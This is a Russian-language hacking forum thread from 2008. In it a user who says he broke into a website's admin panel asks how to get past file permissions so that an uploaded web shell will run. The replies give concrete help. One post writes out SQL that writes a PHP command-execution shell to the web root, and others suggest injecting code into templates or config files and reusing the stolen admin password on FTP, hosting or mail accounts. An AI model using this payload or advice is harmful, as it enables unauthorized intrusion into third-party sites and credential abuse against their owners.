как обойти chmod

Discussion in 'Песочница' started by fominsa, 25 Nov 2008.

  1. fominsa

    fominsa New Member

    Joined:
    12 Nov 2008
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    народ помогите с таким вопросом! есть сайт его я взламал попал в админку в админке есть возможность добавлять файлы но! зараза выставляет chmod 0666 и когда я обращаюсь напрямую к файлу меня перекидывает на сайт хостера (агава) и пишет что права должны быть 0755 что делать вот вроде победа близка:( залить шелл пытался но из за этих прав все к чертям. в папку данную можно залить что угодно хоть .htaccess ( им я чтонибудь могу сделать?)

    кстати тамже можно выполнить любой sql код там есть хрень для ввода sql команд
     
  2. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    ни че тут не сделаешь пробуй в шаблоны код вставить или еще куда либо
     
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    А может дело в хостере, а?
     
  4. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
    INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
    SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";
     
  5. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    после такова запроса у shell.php права будут -rw-rw-rw-
    мало вероятно что он запустится, и агава вроде не даёт привилегия File для mysql.

    ТС ищи скрипты которые можно редактировать, для начала попробуй конфиг
     
    1 person likes this.
  6. Neoveneficus

    Neoveneficus Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    235
    Likes Received:
    126
    Reputations:
    23
    php скрипту не нужны права на запуск. это же не программа... или я не прав?
     
  7. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    все верно
     
    #7 [Raz0r], 25 Nov 2008
    Last edited: 25 Nov 2008
    1 person likes this.
  8. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    ТС попробуй, можт пароль от админки к ftp/хостингу/мылу подходит = )
     
  9. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    лазил на одном серваке, вот там полный пэ, так и не понял почему но скрипт с 0777 не запускался а вот с 0755 запускался как миленький
     
  10. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    127
    Likes Received:
    88
    Reputations:
    17
    Ну да, сейчас, так частенько делают: залить скрипт к соседнему юзеру в папку с правами 777 можешь, а выполнить нет. Я писал про такую хрень недавно

    http://forum.antichat.ru/thread90408.html
     
  11. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    У меня тоже на агаве такое было,сам еле допер что проблема с правами была)
    Но я смотрю,что у тебя возможностей целый вагон, думаю если очень нужен сайт, то справишься) или кидай в раздел "Админки" , там тебе быстро шелл зальют :D
     
Loading...